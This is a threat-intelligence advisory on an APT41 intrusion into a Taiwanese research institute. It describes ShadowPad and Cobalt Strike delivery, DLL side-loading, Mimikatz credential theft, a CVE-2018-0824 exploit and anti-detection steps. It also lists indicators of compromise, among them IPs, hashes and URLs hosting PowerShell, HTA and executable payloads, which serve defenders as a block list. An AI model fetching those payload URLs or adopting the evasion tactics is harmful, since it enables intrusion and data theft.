Analysis Summary

According to recent discoveries, Chinese nation-state threat actor APT41 compromised a Taiwanese government-affiliated research center that specializes in computing and related technologies.

As early as mid-July 2023, the unnamed institute was being targeted to supply a range of backdoors and post-compromise tools, including Cobalt Strike and ShadowPad. With a moderate degree of confidence, it has been linked to the active advanced persistence threat (APT) group, APT41. To load the customized second-stage loader for delivering the payload, the ShadowPad malware utilized in the current campaign took advantage of an out-of-date, insecure version of the Microsoft Office IME binary.

Cybersecurity researchers said, “The threat actor compromised three hosts in the targeted environment and was able to exfiltrate some documents from the network.”

After identifying what it described as an anomalous PowerShell command that connected to an IP address to download and run PowerShell scripts inside the hacked environment, the researchers uncovered the activity in August 2023. Unknown is the precise initial access vector used in the attack, although it required using a web shell to keep persistent access and drop more payloads like Cobalt Strike and ShadowPad, the latter of which was supplied by a Cobalt Strike loader for Go called CS-Avoid-Killing.

An anti-AV loader was used in the development of the Cobalt Strike malware to evade AV detection and escape the security product quarantine. Alternatively, the threat actor was seen using PowerShell commands to start scripts that retrieved the Cobalt Strike malware from a compromised command-and-control (C2) server and ran ShadowPad in memory. DLL side-loading is used to run the ScatterBee loader, which is a DLL-based ShadowPad loader.

Other actions taken as part of the breach included gathering information on user accounts, directory structures, and network configurations by running multiple commands and using Mimikatz to extract passwords. APT41 developed a customized loader to directly inject a proof-of-concept for CVE-2018-0824 into memory. Local privilege escalation was accomplished using a remote code execution vulnerability. The last payload, UnmarshalPwn, is released following three distinct stages.

The researchers also highlighted the adversary's efforts to evade discovery by stopping its operations when it discovered other users on the network. The malicious actor will remove the guest account and web shell that provided the initial access as soon as the backdoors are activated.

Impact

• Cyber Espionage
• Security Bypass
• Code Execution
• Information Theft

Indicators of Compromise

Domain Name

• w2.chatgptsfit.com

IP

• 103.56.114.69
• 45.85.76.10
• 103.96.131.84
• 58.64.204.145

MD5

• 549d5b936e77f1067feb4e395f6f7b61
• 2c66bf055c6349408bf00ec3925cb678
• ccdcad8c74aac5c706cbad7e7ce085d1
• 1647a2c92fc799bd83b0ee33c98ad187
• 027443e516eabfc15ebf76a954c2c61e
• 9ccb2f877777f3db8b1cb58440168ebd
• b39d28b5dc1770ece081b96a561511a0
• 623ac8801fb147ddc30c563f743441e0

SHA-256

• 0ff80e4db32d1d45a0c2afdfd7a1be961c0fbd9d43613a22a989f9024cc1b1e9
• 087c475a1b5b36b7939f5ff12dc711ba591dd2c4227ccaa28d322425ef4d0d4c
• 2e46fcadacfe9e2a63cfc18d95d5870de8b3414462bf14ba9e7c517678f235c9
• eba3138d0f3d2385b55b08d8886b1018834d194440691d33d612402ba8a11d28
• 756ceb563d9283df1fd03252aee9e9621cd2cc7ddb45f596e16660fed1dd6442
• 2149d481b863bec2240ffb64c68f7fb437458885c903a7b0c21aa44f88a69d86
• abb2fe1f67a48b931258e47531884ca5502cec73996e686ca82eeba536258f67
• 9dc827fb1c2e3c12ee39aa5ccf3b31f64051e0cdda9d2ac54caee6b235f52640

SHA1

• 4826fe7edbbfe546253c168e0f652e1500bb70bc
• 03501f7b4f398c682d1de2dc0c503e17f0212afe
• d8d7922a550db6afd661b74eaa97c8f59c76cf21
• f6aae5d8deaa50cbec0503e8219ea5ba0f26db8b
• 884c36c7f146a4ac8941b8227a150daaf9b95dc7
• 2adc28beb14583064d63819b3619794d58734d69
• 2634e0eec33e7fbf734f1a13b023ab8952fe6f03
• d594fb3a164a8adc678086c52d2422e7c9272ebe

URL

• http://103.56.114.69:8085/p.ps1
• https://www.nss.com.tw/p.ps1
• https://www.nss.com.tw/1.hta
• https://www.nss.com.tw/calc.exe
• https://www.nss.com.tw/s.png
• http://45.85.76.18:443/yPc1

Remediation

• Block all threat indicators at your respective controls.
• Search for indicators of compromise (IOCs) in your environment utilizing your respective security controls.
• Enable antivirus and anti-malware software and update signature definitions promptly. Using multi-layered protection is necessary to secure vulnerable assets.
• Patch and upgrade any platforms and software on time and make it into a standard security policy.
• Employ network intrusion detection and prevention systems to monitor and block malicious network activities.
• Implement network segmentation to limit lateral movement for attackers within the network.
• Implement advanced email filtering to detect and block phishing emails.
• Employ updated and robust endpoint protection solutions to detect and block malware.
• Develop and test an incident response plan to ensure a swift and effective response to security incidents.
• Enhance logging and monitoring capabilities to detect anomalous activities and unauthorized access.
• Conduct regular security audits and penetration testing to identify and address potential vulnerabilities.
• Regularly back up critical data and ensure that backup and recovery procedures are in place.